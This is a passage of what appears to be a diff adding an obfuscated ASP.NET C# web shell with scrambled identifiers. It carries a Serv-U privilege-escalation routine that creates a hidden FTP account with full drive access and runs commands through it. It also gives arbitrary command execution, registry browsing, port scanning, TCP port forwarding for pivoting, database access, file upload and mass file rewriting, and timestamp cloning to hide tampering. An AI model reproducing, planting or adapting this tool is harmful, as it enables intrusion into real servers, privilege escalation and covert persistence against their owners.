+hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>"); +if(dOza.Rows[i]["MACAddress"]!=string.Empty) +{ +hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>"); +} +} +DataTable Driver=cCf("Win32_SystemDriver"); +for (int i=0; i<Driver.Rows.Count; i++) +{ +jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> "); +if (Driver.Rows[i]["PathName"]!=string.Empty) +{ +jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]); +} +else +{ +jXkaE.Append("No path information"); +} +jXkaE.Append("</li>"); +} +Bin_Ul_Sys.InnerHtml=yEwc.ToString(); +Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString(); +Bin_Ul_Driver.InnerHtml=jXkaE.ToString(); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void ADCpk() +{ +WICxe(); +APl.Visible=true; +Bin_H2_Title.InnerText="Serv-U Exec >>"; +} +public void lDODR() +{ +string JGGg=string.Empty; +string user=dNohJ.Value; +string pass=NMd.Value; +int port=Int32.Parse(HlQl.Value); +string cmd=mHbjB.Value; +string CRtK="user "+user+"\r\n"; +string jnNG="pass "+pass+"\r\n"; +string site="SITE MAINTENANCE\r\n"; +string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n"; +string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n"; +string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n"; +string zexn="QUIT\r\n"; +UHlA.Visible=true; +try +{ +tcp.Connect("127.0.0.1",port); +tcp.ReceiveBufferSize=1024; +NS=tcp.GetStream(); +Rev(NS); +ZJiM(NS,CRtK); +Rev(NS); +ZJiM(NS,jnNG); +Rev(NS); +ZJiM(NS,site); +Rev(NS); +ZJiM(NS,mtoJb); +Rev(NS); +ZJiM(NS,sutI); +Rev(NS); +ZJiM(NS,iVDT); +Rev(NS); +Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>"; +zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521); +NS1=zvxm.GetStream(); +Rev(NS1); +ZJiM(NS1,"user bin\r\n"); +Rev(NS1); +ZJiM(NS1,"pass binftp\r\n"); +Rev(NS1); +ZJiM(NS1,"site exec "+cmd+"\r\n"); +Rev(NS1); +ZJiM(NS1,"quit\r\n"); +Rev(NS1); +zvxm.Close(); +ZJiM(NS,mtoJb); +Rev(NS); +tcp.Close(); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +protected void Rev(NetworkStream instream) +{ +string FTBtf=string.Empty; +if(instream.CanRead) +{ +byte[] uPZ=new byte[1024]; +do +{ +System.Threading.Thread.Sleep(50); +int len=instream.Read(uPZ,0,uPZ.Length); +FTBtf+=Encoding.Default.GetString(uPZ,0,len); +} +while(instream.DataAvailable); +} +Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>"; +} +protected void ZJiM(NetworkStream instream,string Sendstr) +{ +if(instream.CanWrite) +{ +byte[] uPZ=Encoding.Default.GetBytes(Sendstr); +instream.Write(uPZ,0,uPZ.Length); +} +Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>"; +} +public void xFhz() +{ +WICxe(); +kkHN.Visible=true; +Bin_H2_Title.InnerText="RegShell >>"; +string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG"; +vyX.Text=""; +foreach(string rootkey in txc.Split('|')) +{ +vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | "; +} +lFAvw(); +} +protected void lFAvw() +{ +qPdI.Text=""; +string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG"; +TableRow tr; +TableCell tc; +foreach(string rootkey in txc.Split('|')) +{ +tr=new TableRow(); +tc=new TableCell(); +string bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Width=Unit.Parse("40%"); +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>"; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Width=Unit.Parse("60%"); +tc.Text="<RootKey>"; +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +} +} +protected void tpRQ(string Reg_Path) +{ +if(!Reg_Path.EndsWith("\\")) +{ +Reg_Path=Reg_Path+"\\"; +} +qPdI.Text=Reg_Path; +string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$",""); +cJG=Regex.Replace(cJG,@"\\+","\\"); +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +string bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>"; +tc.Attributes["colspan"]="2" ; +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +try +{ +string subpath; +string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1); +RegistryKey rk=null; +RegistryKey sk; +if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE")) +{ +rk=Registry.LocalMachine; +} +else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT")) +{ +rk=Registry.ClassesRoot; +} +else if(Reg_Path.StartsWith("HKEY_CURRENT_USER")) +{ +rk=Registry.CurrentUser; +} +else if(Reg_Path.StartsWith("HKEY_USERS")) +{ +rk=Registry.Users; +} +else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG")) +{ +rk=Registry.CurrentConfig; +} +if(kDgkX.Length>1) +{ +sk=rk.OpenSubKey(kDgkX); +} +else +{ +sk=rk; +} +foreach(string innerSubKey in sk.GetSubKeyNames()) +{ +tr=new TableRow(); +tc=new TableCell(); +bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Width=Unit.Parse("40%"); +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>"; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Width=Unit.Parse("60%"); +tc.Text="<SubKey>"; +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +} +TableRow cKVA=new TableRow(); +cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;"; +cKVA.Attributes["bgcolor"]="#dddddd"; +TableCell JlmW=new TableCell(); +JlmW.Attributes["colspan"]="2" ; +JlmW.Attributes["height"]="5"; +cKVA.Cells.Add(JlmW); +pLWD.Rows.Add(cKVA); +foreach(string strValueName in sk.GetValueNames()) +{ +tr=new TableRow(); +tc=new TableCell(); +bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Width=Unit.Parse("40%"); +tc.Text=strValueName; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Width=Unit.Parse("60%"); +tc.Text=DdmPl(sk,strValueName); +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public string DdmPl(RegistryKey sk,string strValueName) +{ +object uPZ; +string RaTGr=""; +try +{ +uPZ=sk.GetValue(strValueName,"NULL"); +if(uPZ.GetType()==typeof(byte[])) +{ +foreach(byte tmpbyte in(byte[])uPZ) +{ +if((int)tmpbyte<16) +{ +RaTGr+="0"; +} +RaTGr+=tmpbyte.ToString("X"); +} +} +else if(uPZ.GetType()==typeof(string[])) +{ +foreach(string tmpstr in(string[])uPZ) +{ +RaTGr+=tmpstr; +} +} +else +{ +RaTGr=uPZ.ToString(); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +return RaTGr; +} +public void vNCHZ() +{ +WICxe(); +YwLB.Visible=true; +Bin_H2_Title.InnerText="PortScan >>"; +} +public void rAhe() +{ +WICxe(); +iDgmL.Visible=true; +dQIIF.Visible=false; +Bin_H2_Title.InnerText="DataBase >>"; +} +protected void OUj() +{ +if(Dtdr.State==ConnectionState.Closed) +{ +try +{ +Dtdr.ConnectionString=MasR.Text; +Kkvb.Connection=Dtdr; +Dtdr.Open(); +} +catch(Exception Error) +{ +xseuB(Error.Message); +} +} +} +protected void fUzE() +{ +if(Dtdr.State==ConnectionState.Open) +Dtdr.Close(); +Dtdr.Dispose(); +Kkvb.Dispose(); +} +public DataTable CYUe(string sqlstr) +{ +OleDbDataAdapter da=new OleDbDataAdapter(); +DataTable Dstog=new DataTable(); +try +{ +OUj(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=sqlstr; +da.SelectCommand=Kkvb; +da.Fill(Dstog); +} +catch(Exception) +{ +} +finally +{ +fUzE(); +} +return Dstog; +} +public DataTable[] Bin_Data(string query) +{ +ArrayList list=new ArrayList(); +try +{ +string str; +OUj(); +query=query+"\r\n"; +MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query); +int EmRX=0; +for(int i=0;i<gcod.Count;i++) +{ +Match FJD=gcod[i]; +str=query.Substring(EmRX,FJD.Index-EmRX); +if(str.Trim().Length>0) +{ +OleDbDataAdapter FgzeQ=new OleDbDataAdapter(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=str.Trim(); +FgzeQ.SelectCommand=Kkvb; +DataSet cDPp=new DataSet(); +FgzeQ.Fill(cDPp); +for(int j=0;j<cDPp.Tables.Count;j++) +{ +list.Add(cDPp.Tables[j]); +} +} +EmRX=FJD.Index+3; +} +str=query.Substring(EmRX,query.Length-EmRX); +if(str.Trim().Length>0) +{ +OleDbDataAdapter VwB=new OleDbDataAdapter(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=str.Trim(); +VwB.SelectCommand=Kkvb; +DataSet arG=new DataSet(); +VwB.Fill(arG); +for(int k=0;k<arG.Tables.Count;k++) +{ +list.Add(arG.Tables[k]); +} +} +} +catch(SqlException e) +{ +xseuB(e.Message); +rom.Visible=false; +} +return(DataTable[])list.ToArray(typeof(DataTable)); +} +public void JIAKU(string instr) +{ +try +{ +OUj(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=instr; +Kkvb.ExecuteNonQuery(); +} +catch(Exception e) +{ +xseuB(e.Message); +} +} +public void dwgT() +{ +try +{ +OUj(); +if(WYmo.SelectedItem.Text=="MSSQL") +{ +if(Pvf.SelectedItem.Value!="") +{ +Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString()); +} +} +DataTable[] jxF=null; +jxF=Bin_Data(jHIy.InnerText); +if(jxF!=null && jxF.Length>0) +{ +for(int j=0;j<jxF.Length;j++) +{ +rom.PreRender+=new EventHandler(lRavM); +rom.DataSource=jxF[j]; +rom.DataBind(); +for(int i=0;i<rom.Items.Count;i++) +{ +string bg=OKM(); +rom.Items[i].CssClass=bg; +rom.Items[i].Attributes["onmouseover"]="this.className='focus';"; +rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';"; +} +} +} +else +{ +rom.DataSource=null; +rom.DataBind(); +} +rom.Visible=true; +} +catch(Exception e) +{ +xseuB(e.Message); +rom.Visible=false; +} +} +public void xTZY() +{ +try +{ +if(WYmo.SelectedItem.Text=="MSSQL") +{ +if(Pvf.SelectedItem.Value=="") +{ +rom.DataSource=null; +rom.DataBind(); +return; +} +} +OUj(); +DataTable zKvOw=new DataTable(); +DataTable jxF=new DataTable(); +DataTable baVJV=new DataTable(); +if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="") +{ +Dtdr.ChangeDatabase(Pvf.SelectedItem.Text); +} +zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" }); +jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" }); +foreach(DataRow dr in zKvOw.Rows) +{ +jxF.ImportRow(dr); +} +jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID"); +rom.PreRender+=new EventHandler(lRavM); +rom.DataSource=jxF; +rom.DataBind(); +for(int i=0;i<rom.Items.Count;i++) +{ +string bg=OKM(); +rom.Items[i].CssClass=bg; +rom.Items[i].Attributes["onmouseover"]="this.className='focus';"; +rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';"; +} +rom.Visible=true; +} +catch(Exception e) +{ +xseuB(e.Message); +rom.Visible=false; +} +} +private void lRavM(object sender,EventArgs e) +{ +DataGrid d=(DataGrid)sender; +foreach(DataGridItem item in d.Items) +{ +foreach(TableCell t in item.Cells) +{ +t.Text=t.Text.Replace("<","<").Replace(">",">"); +} +} +} +public void vCf() +{ +dQIIF.Visible=true; +try +{ +jHIy.InnerHtml=string.Empty; +if(WYmo.SelectedItem.Text=="MSSQL") +{ +rom.Visible=false; +uXevN.Visible=true; +irTU.Visible=true; +OUj(); +DataTable ver=CYUe(@"SELECT @@VERSION"); +DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases"); +DataTable cdb=CYUe(@"SELECT DB_NAME()"); +DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')"); +DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')"); +string jHlh=ver.Rows[0][0].ToString(); +string dbo=string.Empty; +if(YKrm.Rows[0][0].ToString()=="1") +{ +dbo="db_owner"; +} +else +{ +dbo="public"; +} +if(rol.Rows[0][0].ToString()=="1") +{ +dbo="<font color=blue>sa</font>"; +} +string db_name=string.Empty; +foreach(ListItem item in FGEy.Items) +{ + if(item.Selected=true) + { + item.Selected=false; + } +} +Pvf.Items.Clear(); +Pvf.Items.Add("-- Select a DataBase --"); +Pvf.Items[0].Value=""; +for(int i=0;i<dbs.Rows.Count;i++) +{ +db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+" | "; +Pvf.Items.Add(dbs.Rows[i][0].ToString()); +} +irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>"; +} +else +{ +uXevN.Visible=false; +irTU.Visible=false; +xTZY(); +} +} +catch(Exception e) +{ +dQIIF.Visible=false; +} +} +public void MHLv() +{ +WICxe(); +hOWTm.Visible=true; +Bin_H2_Title.InnerText="PortMap >>"; +} +public class PortForward +{ +public string Localaddress; +public int LocalPort; +public string RemoteAddress; +public int RemotePort; +string type; +Socket ltcpClient; +Socket rtcpClient; +Socket server; +byte[] DPrPL=new byte[2048]; +byte[] wvZv=new byte[2048]; +public struct session +{ +public Socket rdel; +public Socket ldel; +public int llen; +public int rlen; +} +public static IPEndPoint mtJ(string host,int port) +{ +IPEndPoint iep=null; +IPHostEntry aGN=Dns.Resolve(host); +IPAddress rmt=aGN.AddressList[0]; +iep=new IPEndPoint(rmt,port); +return iep; +} +public void Start(string Rip,int Rport,string lip,int lport) +{ +try +{ +LocalPort=lport; +RemoteAddress=Rip; +RemotePort=Rport; +Localaddress=lip; +rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp); +ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp); +rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient); +} +catch (Exception ex) { } +} +protected void iiGFO(IAsyncResult ar) +{ +try +{ +session RKXy=new session(); +RKXy.ldel=ltcpClient; +RKXy.rdel=rtcpClient; +ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy); +} +catch (Exception ex) { } +} +protected void VTp(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +ltcpClient.EndConnect(ar); +RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy); +RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy); +} +catch (Exception ex) { } +} +private void LFYM(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +int Ret=RKXy.rdel.EndReceive(ar); +if (Ret>0) +ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy); +else lyTOK(); +} +catch (Exception ex) { } +} +private void JTcp(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +RKXy.ldel.EndSend(ar); +RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy); +} +catch (Exception ex) { } +} +private void xPS(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +int Ret=RKXy.ldel.EndReceive(ar); +if (Ret>0) +RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy); +else lyTOK(); +} +catch (Exception ex) { } +} +private void IZU(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +RKXy.rdel.EndSend(ar); +RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy); +} +catch (Exception ex) { } +} +public void lyTOK() +{ +try +{ +if (ltcpClient!=null) +{ +ltcpClient.Close(); +} +if (rtcpClient!=null) +rtcpClient.Close(); +} +catch (Exception ex) { } +} +} +protected void vuou() +{ +PortForward gYP=new PortForward(); +gYP.lyTOK(); +} +protected void ruQO() +{ +PortForward gYP=new PortForward(); +gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value)); +} +public string mRDl(string instr) +{ +string tmp=null; +try +{ +tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString(); +} +catch(Exception e) +{ +} +return tmp; +} +public void VikG() +{ +string[] OTV=lOmX.Text.ToString().Split(','); +for(int i=0;i<OTV.Length;i++) +{ +IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i]))); +} +try +{ +Thread[] kbXY=new Thread[IVc.Count]; +int sdO=0; +for(sdO=0;sdO<IVc.Count;sdO++) +{ +kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan)); +kbXY[sdO].Start(); +} +for(sdO=0;sdO<kbXY.Length;sdO++) +kbXY[sdO].Join(); +} +catch +{ +} +} +public class ScanPort +{ +private string _ip=""; +private int jTdO=0; +private TimeSpan _timeSpent; +private string QGcH="Not scanned"; +public string ip +{ +get { return _ip;} +} +public int port +{ +get { return jTdO;} +} +public string status +{ +get { return QGcH;} +} +public TimeSpan timeSpent +{ +get { return _timeSpent;} +} +public ScanPort(string ip,int port) +{ +_ip=ip; +jTdO=port; +} +public void Scan() +{ +TcpClient iYap=new TcpClient(); +DateTime qYZT=DateTime.Now; +try +{ +iYap.Connect(_ip,jTdO); +iYap.Close(); +QGcH="<font color=green><b>Open</b></font>"; +} +catch +{ +QGcH="<font color=red><b>Close</b></font>"; +} +_timeSpent=DateTime.Now.Subtract(qYZT); +} +} +public static void YFcNP(System.Web.UI.Page page) +{ +page.RegisterHiddenField("__EVENTTARGET",""); +page.RegisterHiddenField("__FILE",""); +string s=@"<script language=Javascript>"; +s+=@"function Bin_PostBack(eventTarget,eventArgument)"; +s+=@"{"; +s+=@"var theform=document.forms[0];"; +s+=@"theform.__EVENTTARGET.value=eventTarget;"; +s+=@"theform.__FILE.value=eventArgument;"; +s+=@"theform.submit();"; +s+=@"} "; +s+=@"</scr"+"ipt>"; +page.RegisterStartupScript("",s); +} +protected void PPtK(object sender,EventArgs e) +{ +WICxe(); +yhv.Visible=true; +Bin_H2_Title.InnerText="File Search >>"; +NaLJ.Value=Request.PhysicalApplicationPath; +oJiym.Visible=false; +} +protected void NBy(object sender,EventArgs e) +{ +DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value); +if(!GQMM.Exists) +{ +xseuB("Path invalid ! "); +return; +} +oog(GQMM); +xseuB("Search completed ! "); +} +public void oog(DirectoryInfo dir) +{ +try +{ +oJiym.Visible=true; +foreach(FileInfo Bin_Files in dir.GetFiles()) +{ +try +{ +if(Bin_Files.FullName==Request.PhysicalPath) +{ +continue; +} +if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase)) +{ +continue; +} +if(Ven.SelectedItem.Value=="name") +{ +if(rAQ.Checked) +{ +if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase)) +{ +FJvQ(Bin_Files); +} +} +else +{ +if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1) +{ +Response.Write(Bin_Files.FullName); +FJvQ(Bin_Files); +} +} +} +else +{ +StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default); +string ava=sr.ReadToEnd(); +sr.Close(); +if(rAQ.Checked) +{ +if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase)) +{ +FJvQ(Bin_Files); +if(YZw.Checked) +{ +ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase); +StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default); +sw.Write(ava); +sw.Close(); +} +} +} +else +{ +if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1) +{ +FJvQ(Bin_Files); +if(YZw.Checked) +{ +ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text); +StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default); +sw.Write(ava); +sw.Close(); +} +} +} +} +} +catch(Exception ex) +{ +xseuB(ex.Message); +continue; +} +} +foreach(DirectoryInfo subdir in dir.GetDirectories()) +{ +oog(subdir); +} +} +catch(Exception ex) +{ +xseuB(ex.Message); +} +} +public void FJvQ(FileInfo objfile) +{ +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +string bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>"; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Text=objfile.LastWriteTime.ToString(); +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Text=mTG(objfile.Length); +tr.Cells.Add(tc); +oJiym.Rows.Add(tr); +} +public void xseuB(string instr) +{ +jDKt.Visible=true; +jDKt.InnerText=instr; +} +protected void xVm(object sender,EventArgs e) +{ +string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower(); +if(Jfm==Password) +{ +Response.Cookies.Add(new HttpCookie(vbhLn,Password)); +ljtzC.Visible=false; +PBZw(); +} +else +{ +tZSx(); +} +} +protected void Ybg(object sender,EventArgs e) +{ +krIR(Server.MapPath(".")); +} +protected void KjPi(object sender,EventArgs e) +{ +Bin_H2_Title.InnerText="IIS Spy >>"; +WICxe(); +VNR.Visible=true; +AdCx(); +} +protected void DGCoW(object sender,EventArgs e) +{ +try +{ +StreamWriter sw; +if(NdCX.SelectedItem.Text=="UTF-8") +{ +sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8); +} +else +{ +sw=new StreamWriter(Sqon.Value,false,Encoding.Default); +} +sw.Write(Xgvv.InnerText); +sw.Close(); +xseuB("Save file success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void lbjLD(object sender,EventArgs e) +{ +string FlwA=AXSbb.Value; +FlwA=OElM(FlwA); +try +{ +Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value)); +xseuB("File upload success!"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void EXV(object sender,EventArgs e) +{ +krIR(AXSbb.Value); +} +protected void mcCY(object sender,EventArgs e) +{ +krIR(Server.MapPath(".")); +} +protected void iVk(object sender,CommandEventArgs e) +{ +krIR(e.CommandArgument.ToString()); +} +protected void XXrLw(object sender,EventArgs e) +{ +try +{ +File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value)); +File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value)); +File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value)); +xseuB("File time clone success!"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void tIykC(object sender,EventArgs e) +{ +string path=pWVL.Value; +try +{ +File.SetAttributes(path,FileAttributes.Normal); +if(ZhWSK.Checked) +{ +File.SetAttributes(path,FileAttributes.ReadOnly); +} +if(SsR.Checked) +{ +File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System); +} +if(ccB.Checked) +{ +File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden); +} +if(fbyZ.Checked) +{ +File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive); +} +File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value)); +File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value)); +File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value)); +xseuB("File attributes modify success!"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void VOxn(object sender,EventArgs e) +{ +WICxe(); +vIac.Visible=true; +Bin_H2_Title.InnerText="Execute Command >>"; +} +protected void FbhN(object sender,EventArgs e) +{ +try +{ +Process ahAE=new Process(); +ahAE.StartInfo.FileName=kusi.Value; +ahAE.StartInfo.Arguments=bkcm.Value; +ahAE.StartInfo.UseShellExecute=false; +ahAE.StartInfo.RedirectStandardInput=true; +ahAE.StartInfo.RedirectStandardOutput=true; +ahAE.StartInfo.RedirectStandardError=true; +ahAE.Start(); +string Uoc=ahAE.StandardOutput.ReadToEnd(); +Uoc=Uoc.Replace("<","<"); +Uoc=Uoc.Replace(">",">"); +Uoc=Uoc.Replace("\r\n","<br>"); +tnQRF.Visible=true; +tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>"; +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +protected void RAFL(object sender,EventArgs e) +{ +if(qPdI.Text.Length>0) +{ +tpRQ(qPdI.Text); +} +else +{ +lFAvw(); +} +} +protected void Grxk(object sender,EventArgs e) +{ +YUw(); +} +protected void ilC(object sender,EventArgs e) +{ +tZRH(); +} +protected void HtB(object sender,EventArgs e) +{ +pDVM(); +} +protected void Olm(object sender,EventArgs e) +{ +iLVUT(); +} +protected void jXhS(object sender,EventArgs e) +{ +ADCpk(); +} +protected void lRfRj(object sender,EventArgs e) +{ +lDODR(); +} +protected void xSy(object sender,EventArgs e) +{ +xFhz(); +} +protected void dMx(object sender,EventArgs e) +{ +rAhe(); +} +protected void zOVO(object sender,EventArgs e) +{ +if(((DropDownList)sender).ID.ToString()=="WYmo") +{ +dQIIF.Visible=false; +MasR.Text=WYmo.SelectedItem.Value.ToString(); +} +if(((DropDownList)sender).ID.ToString()=="Pvf") +{ +xTZY(); +} +if(((DropDownList)sender).ID.ToString()=="FGEy") +{ +jHIy.InnerText=FGEy.SelectedItem.Value.ToString(); +} +if(((DropDownList)sender).ID.ToString()=="NdCX") +{ +gLKc(Sqon.Value); +} +} +protected void IkkO(object sender,EventArgs e) +{ +krIR(AXSbb.Value); +} +protected void BGY(object sender,EventArgs e) +{ +vCf(); +} +protected void cptS(object sender,EventArgs e) +{ +vNCHZ(); +} +protected void fDO(object sender,EventArgs e) +{ +MHLv(); +} +protected void vJNsE(object sender,EventArgs e) +{ +vuou(); +xseuB("Clear All Thread ......"); +} +protected void wDZ(object sender,EventArgs e) +{ +if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return; +ruQO(); +xseuB("All Thread Start ......"); +} +protected void tYoZ(object sender,EventArgs e) +{ +} +protected void ELkQ(object 